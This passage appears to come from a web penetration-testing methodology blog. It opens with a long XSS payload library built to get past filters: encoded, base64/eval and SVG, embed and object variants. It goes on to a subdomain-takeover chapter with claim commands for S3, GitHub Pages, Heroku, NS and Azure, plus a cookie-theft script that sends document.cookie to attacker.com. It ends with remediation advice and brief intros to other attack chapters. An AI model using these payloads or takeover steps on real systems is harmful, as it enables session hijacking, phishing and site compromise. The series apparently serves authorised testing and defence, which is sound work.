&#x003c;img src=1 onerror=confirm(1)&#x003e;

[HTML ENTITY — event value also encoded (survives htmlspecialchars)]
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>
<img src=x onerror=&#x61;l&#x65;rt&#x28;1&#x29;>
<img src=x onerror=al&#101;rt(1)>
<img src=x onerror=&#97&#108&#101&#114&#116&#40&#49&#41>

[HTML ENTITY — full attribute in quotes]
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=x onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">

[URL ENCODED]
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
%3Cimg%20src%3D1%20onerror%3Dconfirm(1)%3E
%3cimg+src%3dx+onerror%3dalert(document.domain)%3e

[DOUBLE URL ENCODED]
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253cimg%2520src%253d1%2520onerror%253dconfirm%25281%2529%253e

[URL + HTML ENTITY COMBINED]
%26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B
%26%23x003c%3Bimg%20src%3D1%20onerror%3Dconfirm(1)%26%23x003e%3B%0A

[CASE VARIATION + DOUBLE ENCODE — WAF bypass]
%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E

[HEX ESCAPE in event]
<img src=x onerror="\x61\x6c\x65\x72\x74(1)">

[UNICODE ESCAPE in event]
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">
<img src=x onerror="\u{61}lert(1)">

[BASE64 eval — survives many keyword filters]
<img src=x onerror="eval(atob('YWxlcnQoMSk='))">
<img src=x onerror="eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))">
<img src=x onerror="eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))">

[FROMCHARCODE — no string literals needed]
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">

`<svg>` Based

[RAW]
<svg onload=alert(1)>
<svg/onload=confirm(1)>
<svg onload=alert(document.domain)>

[HTML ENTITY]
&#x3c;svg onload=alert(1)&#x3e;
&#x003c;svg onload=alert(document.domain)&#x003e;
&#60;svg onload=alert(1)&#62;

[URL ENCODED]
%3Csvg%20onload%3Dalert(1)%3E
%3csvg%2fonload%3dconfirm(1)%3e

[DOUBLE URL ENCODED]
%253Csvg%2520onload%253Dalert(1)%253E
%253CSvg%2520OnLoAd%253Dconfirm(1)%253E

[SVG ANIMATE — alternative to onload]
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><set onbegin=alert(1) attributeName=x to=1>
<svg><discard onbegin=alert(1)>

[SVG SCRIPT element]
<svg><script>alert(1)</script></svg>
<svg><script>alert&#40;1&#41;</script></svg>
<svg><script>alert&lpar;1&rpar;</script></svg>

`<embed>`, `<object>`, `<base>` — Often Missed by Filters

[EMBED]
<embed src=javascript:alert(1)>
<embed src="javascript:alert(document.domain)">
<embed src=https://az0th.it/x//alert(1)>

[OBJECT]
<object data=javascript:alert(1)>
<object data="javascript:alert(document.cookie)">
&#x3c;object data=javascript:alert(1)&#x3e;

[BASE HREF POISONING — redirects all relative script loads]
<base href="javascript:\
<base href="javascript:alert(1)//">
<base href="//attacker.com/">

[EMBED + BASE COMBINED]
<embed src=https://az0th.it/x//alert(1)><base href="javascript:\

Bypassing Specific Sanitizers

Bypassing `strip_tags()` — PHP

strip_tags() removes tags but leaves content. Critical: it does NOT protect attribute context.

Subdomain Takeover

Tue, 24 Feb 2026 00:00:00 +0000

Subdomain Takeover

Severity: High–Critical | CWE: CWE-350 OWASP: A05:2021 – Security Misconfiguration

What Is Subdomain Takeover?

A subdomain takeover occurs when a DNS record (CNAME, A, NS) points to an external service that no longer exists or is unclaimed. An attacker registers the unclaimed resource and takes control of the subdomain — enabling phishing, cookie theft, and XSS on the parent domain’s trust.

DNS: shop.target.com  CNAME  target.myshopify.com
Shopify store was deleted → target.myshopify.com is unclaimed
Attacker creates Shopify store at target.myshopify.com
→ shop.target.com now serves attacker-controlled content

Impact:
- SameSite cookie theft (same eTLD+1)
- Subdomain XSS → steals parent domain cookies (if SameSite=Lax/None)
- Phishing under trusted domain
- CORS bypass (if wildcard *.target.com is trusted)
- Bypass CSP (if *.target.com in script-src)
- SPF/DKIM abuse for email phishing

Discovery Checklist

Enumerate all subdomains (amass, subfinder, assetfinder, dnsx)
For each subdomain: check DNS resolution → CNAME chain → ultimate target
For CNAME targets: check if service/bucket/page is claimed
Look for common “unclaimed” error messages per service (see table below)
Check NS delegations — is subdomain NS pointing to attacker-registerable zone?
Check A records pointing to cloud IPs that may be released
Test S3 buckets, Azure Blob, GitHub Pages, Heroku, Netlify, Vercel, etc.
Check expired/deleted infrastructure in CI/CD pipelines
Check wildcard DNS responses (*.target.com → may mask subdomain enumeration)

Fingerprint Table — “Unclaimed” Error Messages

Service	Fingerprint String
GitHub Pages	`There isn't a GitHub Pages site here.`
AWS S3	`NoSuchBucket`, `The specified bucket does not exist`
AWS Elastic Beanstalk	`NXDOMAIN` on `.elasticbeanstalk.com`
Heroku	`No such app`, `herokussl.com` CNAME dangling
Netlify	`Not Found - Request ID`
Fastly	`Fastly error: unknown domain`
Shopify	`Sorry, this shop is currently unavailable`
Tumblr	`There's nothing here.`
WordPress.com	`Do you want to register *.wordpress.com?`
Surge.sh	`project not found`
Azure	`The specified container does not exist`
Zendesk	`Oops, this page no longer exists`
StatusPage.io	`You are being redirected`
UserVoice	`This UserVoice subdomain is currently available`
Pantheon	`404 error unknown site!`
Ghost	`The thing you were looking for is no longer here`
Cargo Collective	`404 Not Found`
Fly.io	NXDOMAIN on `.fly.dev`

Payload Library

Attack 1 — S3 Bucket Takeover

# CNAME: static.target.com → target-static.s3.amazonaws.com
# Bucket target-static doesn't exist

# Check if CNAME exists and bucket is unclaimed:
dig CNAME static.target.com
# → target-static.s3.amazonaws.com.

# Check bucket claim status:
curl -s http://target-static.s3.amazonaws.com/ | grep -i "nosuchbucket\|NoSuchBucket"

# Claim the bucket (same region required):
aws s3api create-bucket \
  --bucket target-static \
  --region us-east-1

# Or for other regions:
aws s3api create-bucket \
  --bucket target-static \
  --region eu-west-1 \
  --create-bucket-configuration LocationConstraint=eu-west-1

# Upload XSS PoC:
echo '<html><body><h1>Subdomain Takeover PoC</h1></body></html>' > index.html
aws s3 cp index.html s3://target-static/ --acl public-read
aws s3 website s3://target-static/ --index-document index.html

# Cookie theft payload (if subdomain shares cookies with parent):
echo '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' > steal.html
aws s3 cp steal.html s3://target-static/cookie-steal.html --acl public-read

Attack 2 — GitHub Pages Takeover

# CNAME: blog.target.com → target-company.github.io
# GitHub organization/user doesn't have Pages configured for that repo

# Check:
curl -s https://blog.target.com/ | grep -i "github pages"

# Takeover steps:
# 1. Create GitHub account/org with same username as target-company
# 2. Create repository named target-company.github.io
# 3. Enable GitHub Pages on that repo
# 4. Add CNAME file containing: blog.target.com
# 5. Push index.html with PoC

git init takeover-pages
cd takeover-pages
echo "blog.target.com" > CNAME
echo '<html><body>Subdomain Takeover PoC</body></html>' > index.html
git add . && git commit -m "PoC"
git remote add origin https://github.com/target-company/target-company.github.io
git push -u origin main
# Then enable GitHub Pages in repo settings

Attack 3 — Heroku Takeover

# CNAME: api.target.com → target-api.herokuapp.com
# Heroku app was deleted

# Check:
curl -s https://api.target.com/ | grep -i "no such app\|heroku"

# Takeover:
heroku login
heroku create target-api  # claim the app name
heroku domains:add api.target.com --app target-api
# Deploy minimal app:
echo '{"name": "takeover-poc"}' > package.json
echo 'const http = require("http"); http.createServer((req,res)=>{ res.end("Takeover PoC"); }).listen(process.env.PORT)' > index.js
heroku git:remote -a target-api
git push heroku main

Attack 4 — NS Subdomain Takeover

# Most impactful: NS delegation for sub.target.com to a registerable zone

# Check NS records:
dig NS internal.target.com
# → ns1.expired-dns-provider.com
# → ns2.expired-dns-provider.com

# If expired-dns-provider.com can be registered:
# 1. Register expired-dns-provider.com
# 2. Set up authoritative DNS
# 3. Create zone for internal.target.com
# 4. Point to attacker-controlled IPs
# → Full control of all *.internal.target.com

# NS takeover gives full DNS control → can create any subdomain
# Can set up: mail.internal.target.com for email phishing
# Can create: login.internal.target.com for credential harvest

Attack 5 — Azure / Cloud Provider Takeover

# Azure App Service:
# CNAME: app.target.com → target-app.azurewebsites.net
# Azure resource deleted → unclaimed

# Check:
curl -s https://target-app.azurewebsites.net/ | grep -i "azure\|404 web site not found"

# Azure blob storage:
# CNAME: files.target.com → targetfiles.blob.core.windows.net
dig CNAME files.target.com
# Check container:
curl -s https://targetfiles.blob.core.windows.net/ | grep -i "nosuchcontainer\|specified container"

# Claim Azure blob:
az login
az storage account create --name targetfiles --resource-group myRG --location eastus
az storage container create --name '$web' --account-name targetfiles
az storage blob upload --file index.html --container-name '$web' --name index.html \
  --account-name targetfiles --auth-mode key

# Netlify/Vercel takeover:
# CNAME: landing.target.com → target-landing.netlify.app
# Create Netlify site with same name + custom domain

Tools

# Subdomain enumeration:
amass enum -d target.com -o subdomains.txt
subfinder -d target.com -o subdomains.txt
assetfinder target.com | tee subdomains.txt
findomain -t target.com -o subdomains.txt

# CNAME chain resolution:
dnsx -l subdomains.txt -cname -o cnames.txt
massdns -r resolvers.txt -t CNAME subdomains.txt

# Automated takeover detection:
# subjack:
go install github.com/haccer/subjack@latest
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -c fingerprints.json

# subzy:
go install github.com/LukaSikic/subzy@latest
subzy run --targets subdomains.txt --hide_fails --verify_ssl

# nuclei with takeover templates:
nuclei -l subdomains.txt -t takeovers/ -c 50

# can-i-take-over-xyz (reference list):
# https://github.com/EdOverflow/can-i-take-over-xyz

# Manual CNAME chain check:
while IFS= read -r subdomain; do
  cname=$(dig +short CNAME "$subdomain" | tr -d '.')
  if [ -n "$cname" ]; then
    echo "$subdomain → $cname"
    response=$(curl -sk "https://$subdomain/" | head -5)
    echo "$response"
  fi
done < subdomains.txt

# Check S3 bucket availability:
aws s3api head-bucket --bucket BUCKET_NAME 2>&1 | grep -i "nosuchbucket\|403\|404"

Remediation Reference

Regular DNS audits: scan all DNS records quarterly, remove dangling CNAMEs immediately
Infrastructure decommission process: DNS record removal must be part of any service teardown
Monitor CNAME targets: alert when CNAME ultimate target becomes unresolvable or returns error
Avoid wildcard CNAME: *.target.com → *.cloudprovider.com is highly dangerous
Register defensive resources: claim common variations of your org name on cloud providers
Track external dependencies: maintain inventory of all external services with DNS entries

Part of the Web Application Penetration Testing Methodology series.

Swagger / OpenAPI Endpoint Testing in Infrastructure

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Swagger UI is the most widely deployed tool for visualizing and interacting with REST API specifications. When encountered during an infrastructure penetration test, a Swagger UI endpoint represents a complete map of an application’s API attack surface: all endpoints, parameters, data models, authentication schemes, and sometimes internal paths are exposed. Beyond information disclosure, several attack vectors specific to Swagger UI and OpenAPI spec handling — including SSRF via configUrl, XSS via spec injection, and authentication bypass — make it a high-priority finding.

Telnet — Modern Attack Surface and CVE-2026-24061

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Telnet (TELetype NETwork, RFC 854) is a decades-old protocol operating on TCP port 23 that provides an unencrypted bidirectional text communication channel. In 2026, Telnet continues to appear in pentests and red team engagements — on embedded devices, industrial controllers, medical devices, network equipment, IoT sensors, smart building systems, and legacy operational technology. It also appears on Linux servers still running inetutils-telnetd, where a critical authentication bypass was disclosed in early 2026.

Timing Attacks on Authentication

Tue, 24 Feb 2026 00:00:00 +0000

Timing Attacks on Authentication

Severity: Medium–High | CWE: CWE-208, CWE-385 OWASP: A02:2021 – Cryptographic Failures | A07:2021 – Identification and Authentication Failures

What Are Timing Attacks?

Timing attacks exploit measurable differences in processing time to infer secret information — whether a guess is correct, whether a user exists, or whether a token matches. The root cause is non-constant-time comparison: == short-circuits on the first mismatch, so comparing "AAAA" == "AAAB" takes longer than "AAAA" == "ZZZZ" because the mismatch occurs later in the first case.

Username Enumeration

Tue, 24 Feb 2026 00:00:00 +0000

Username Enumeration

Severity: Medium | CWE: CWE-204, CWE-203 OWASP: A07:2021 – Identification and Authentication Failures

What Is Username Enumeration?

Username enumeration allows an attacker to determine which usernames (email addresses, account identifiers) are registered in a system. Even without a password, a validated target list dramatically improves credential stuffing, targeted phishing, and brute force efficiency.

Enumeration channels:

Differential HTTP responses: different status code, body text, or length for valid vs invalid usernames
Timing differences: valid usernames trigger more computation (password hash comparison) → measurable delay
Indirect channels: password reset, registration, OAuth errors, email verification, API error bodies, profile URLs

Indicator comparison:
  Invalid user:  HTTP 200, body: "Invalid credentials"        (13ms)
  Valid user:    HTTP 200, body: "Invalid credentials"        (87ms) ← timing leak
  → identical visible response, but 74ms difference → valid user does bcrypt compare

Discovery Checklist

Phase 1 — Login Endpoint

Web Application Penetration Testing — Master Index

Tue, 24 Feb 2026 00:00:00 +0000

Web Application Penetration Testing — Master Index

Ordered by WAPT workflow: start from input fields → auth → authz → upload → server-side → client-side → infrastructure → API. 76 chapters. All published.

001 — INPUT: User-Controlled Fields & Parameters

First thing you test: every field that sends data to the server.

File	Vulnerability
`001_INPUT_SQLi.md`	SQL Injection (Error-based, Union, Blind, Time-based, OOB)
`002_INPUT_NoSQLi.md`	NoSQL Injection (MongoDB, CouchDB, Redis)
`003_INPUT_LDAP_Injection.md`	LDAP Injection
`004_INPUT_XPath_Injection.md`	XPath Injection
`005_INPUT_XQuery_Injection.md`	XQuery Injection
`006_INPUT_CMDi.md`	OS Command Injection
`007_INPUT_SSTI.md`	Server-Side Template Injection (SSTI)
`008_INPUT_CSTI.md`	Client-Side Template Injection (CSTI)
`009_INPUT_SSI_Injection.md`	Server-Side Includes (SSI) Injection
`010_INPUT_EL_Injection.md`	Expression Language Injection (EL)
`011_INPUT_XXE.md`	XML External Entity (XXE)
`012_INPUT_Log4Shell.md`	Log4j / Log Injection (Log4Shell)
`013_INPUT_Mail_Injection.md`	IMAP/SMTP Header Injection
`014_INPUT_HTTP_Header_Injection.md`	HTTP Header Injection / Response Splitting
`015_INPUT_HTTP_Param_Pollution.md`	HTTP Parameter Pollution (HPP)
`016_INPUT_Open_Redirect.md`	Open Redirect
`017_INPUT_Host_Header.md`	Host Header Attacks
`018_INPUT_GraphQL_Injection.md`	GraphQL Injection (SQLi/CMDi/SSRF via resolvers)
`019_INPUT_Integer_Type_Juggling.md`	Integer Overflow / Type Juggling
`020_INPUT_XSS_Reflected.md`	Cross-Site Scripting — Reflected
`021_INPUT_XSS_Stored.md`	Cross-Site Scripting — Stored
`022_INPUT_XSS_DOM.md`	Cross-Site Scripting — DOM
`023_INPUT_XSS_Blind.md`	Cross-Site Scripting — Blind

030 — AUTH: Authentication

Login page, tokens, MFA, password reset.

Web Cache Deception

Tue, 24 Feb 2026 00:00:00 +0000

Web Cache Deception

Severity: High | CWE: CWE-200, CWE-346 OWASP: A01:2021 – Broken Access Control

What Is Web Cache Deception?

Unlike cache poisoning (attacker poisons cache to affect other users), cache deception tricks the cache into storing a victim’s private, authenticated response as a public, cacheable resource — then the attacker retrieves it.

Normal: GET /account/profile → private, authenticated → Cache-Control: no-store
Trick:  GET /account/profile.css → server ignores .css, serves profile page
        CDN caches because .css extension → marked as static asset
Attacker: GET /account/profile.css → CDN returns cached victim profile

Key requirement: path routing that ignores the appended path/extension, combined with a cache that uses file-extension-based caching rules.

Web Cache Poisoning

Tue, 24 Feb 2026 00:00:00 +0000

Web Cache Poisoning

Severity: High–Critical | CWE: CWE-346, CWE-116 OWASP: A05:2021 – Security Misconfiguration

What Is Web Cache Poisoning?

A cache stores responses keyed by URL + headers. Poisoning works by injecting malicious content into a cached response that is then served to all users requesting the same URL. Key concept: cache key (what identifies a unique cache entry) vs unkeyed inputs (headers/params that affect the response but aren’t in the cache key).

WebSocket Protocol Security (Deep Dive)

Tue, 24 Feb 2026 00:00:00 +0000

WebSocket Protocol Security (Deep Dive)

Severity: High | CWE: CWE-345, CWE-284, CWE-89 OWASP: A01:2021 – Broken Access Control | A03:2021 – Injection

WebSocket Protocol vs. HTTP

WebSocket (RFC 6455) establishes a persistent, bidirectional, full-duplex channel over a single TCP connection. After the HTTP/1.1 upgrade handshake, the protocol operates independently of HTTP — separate authentication model, separate framing, separate proxy behavior. This creates attack surface that HTTP-focused defenses miss.

Key differences from HTTP:

WebSocket Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

WebSocket Security Testing

Severity: High | CWE: CWE-345, CWE-20, CWE-79 OWASP: A03:2021 – Injection | A07:2021 – Identification and Authentication Failures

What Are WebSocket Attacks?

WebSockets provide full-duplex, persistent connections. Unlike HTTP, WebSocket frames lack built-in CSRF protection, don’t require Content-Type negotiation, and are often less scrutinized for injection. Attack surface: Cross-Site WebSocket Hijacking (CSWSH), injection via WebSocket messages, and authentication bypass.

Upgrade handshake:
GET /chat HTTP/1.1
Host: target.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Origin: https://target.com

→ After upgrade: bidirectional message frames
→ No per-message CSRF protection
→ No per-message authentication header requirement

Discovery Checklist

Find WebSocket endpoints: browser DevTools → Network → WS filter
Check Upgrade handshake — does server validate Origin header?
Test CSWSH: connect from attacker.com — does it use victim’s session cookie?
Replay captured WebSocket messages with modified data (Burp WS Repeater)
Test injection in WebSocket message payloads: XSS, SQLi, CMDi, SSTI
Check authentication: is auth checked at handshake only or per-message?
Test for IDOR in message IDs/room IDs
Test for privilege escalation via message type manipulation
Check if WebSocket messages are reflected (stored XSS via WS)
Test token-based auth: JWT in WS URL or first message — test bypass
Test reconnection — does reconnect revalidate auth?
Test wss:// downgrade to ws:// (cleartext)

Payload Library

Attack 1 — Cross-Site WebSocket Hijacking (CSWSH)

If the server doesn’t validate the Origin header during the WebSocket handshake, an attacker’s page can initiate a WebSocket connection that carries the victim’s session cookie.

Wi-Fi Penetration Testing Guide

Tue, 24 Feb 2026 00:00:00 +0000

Wi-Fi Penetration Testing Guide

From Passive Analysis to Enterprise-Level Attacks

Legal Disclaimer: This guide is published for educational purposes and authorized security assessments only. Performing attacks on networks without explicit written authorization is illegal in most jurisdictions. Use these techniques exclusively on networks you own or in controlled lab environments.

1. 802.11 Fundamentals

1.1 The IEEE 802.11 Standard

IEEE 802.11 is the family of standards governing wireless local area network (WLAN) communications. Transmission occurs over radio frequencies, primarily on:

XML External Entity Injection (XXE)

Tue, 24 Feb 2026 00:00:00 +0000

XML External Entity Injection (XXE)

Severity: Critical CWE: CWE-611 OWASP: A05:2021 – Security Misconfiguration

What Is XXE?

XML External Entity Injection occurs when an XML parser processes external entity declarations defined by the attacker within the XML input. If the parser is configured to resolve external entities (often the default in older or misconfigured libraries), an attacker can:

Read arbitrary files from the server filesystem
Trigger SSRF to internal services and cloud metadata
Perform blind data exfiltration via DNS/HTTP
In some configurations, achieve Remote Code Execution

XXE affects anything that parses XML: REST APIs accepting Content-Type: application/xml, SOAP services, file upload endpoints processing DOCX/XLSX/SVG/PDF/ODT, and any XML-based data exchange format.

XPath Injection

Tue, 24 Feb 2026 00:00:00 +0000

XPath Injection

Severity: High | CWE: CWE-91 OWASP: A03:2021 – Injection

What Is XPath Injection?

XPath is a query language for navigating XML documents. Applications that use XPath to query XML-backed datastores (config files, LDAP over XML, XML databases, SAML assertions) are vulnerable when user input is concatenated directly into XPath expressions.

Unlike SQL, XPath has no native parameterization in most implementations — making injection structurally similar to classic SQLi but with XPath operators and axes.

XQuery Injection

Tue, 24 Feb 2026 00:00:00 +0000

XQuery Injection

Severity: High | CWE: CWE-652 OWASP: A03:2021 – Injection

What Is XQuery Injection?

XQuery is a functional query language for XML databases (BaseX, eXist-db, MarkLogic, Saxon). Like SQL injection against relational databases, XQuery injection occurs when user input is concatenated directly into an XQuery expression. The impact ranges from data extraction (full XML database dump) to RCE in some implementations that expose XQuery functions like file:write(), proc:system(), or Java class invocation.

XXE via Binary Formats (DOCX, XLSX, SVG, ODT)

Tue, 24 Feb 2026 00:00:00 +0000

XXE via Binary Formats (DOCX, XLSX, SVG, ODT)

Severity: High–Critical | CWE: CWE-611 OWASP: A05:2021 – Security Misconfiguration

What Is XXE via Binary Formats?

XML External Entity injection isn’t limited to endpoints that explicitly accept XML. Many modern file formats are ZIP archives containing XML files — Office Open XML (DOCX, XLSX, PPTX), OpenDocument (ODT, ODS), EPUB, JAR/WAR — and are processed server-side by import features, preview generators, or document converters. Any of these can trigger XXE if the server-side XML parser has external entities enabled.

Zip Slip / Archive Path Traversal

Tue, 24 Feb 2026 00:00:00 +0000

Zip Slip / Archive Path Traversal

Severity: Critical | CWE: CWE-22, CWE-434 OWASP: A04:2021 – Insecure Design

What Is Zip Slip?

Zip Slip is a directory traversal vulnerability in archive extraction logic. When an archive contains a file with a path like ../../webroot/shell.php, insecure extraction code writes the file outside the intended target directory — overwriting arbitrary files and enabling RCE via webshell drop.

Affected archive formats: ZIP, TAR, GZ, TAR.GZ, BZ2, TGZ, AR, CAB, RPM, 7Z, WAR, EAR, JAR (any format that supports subdirectories in file entries).

IP Camera A-CW2303C-M — Hardware & Firmware Analysis

Thu, 12 Feb 2026 00:00:00 +0000

Full hardware-level engagement on an IP PTZ camera: SPI flash dump, filesystem extraction, and manual static analysis revealing 8 vulnerabilities — including two critical RCE.

NetAuditor

Wed, 01 Jan 2025 00:00:00 +0000

Automated network security assessment tool — nmap, ssh-audit, testssl, evidence extraction and screenshots in a single pipeline.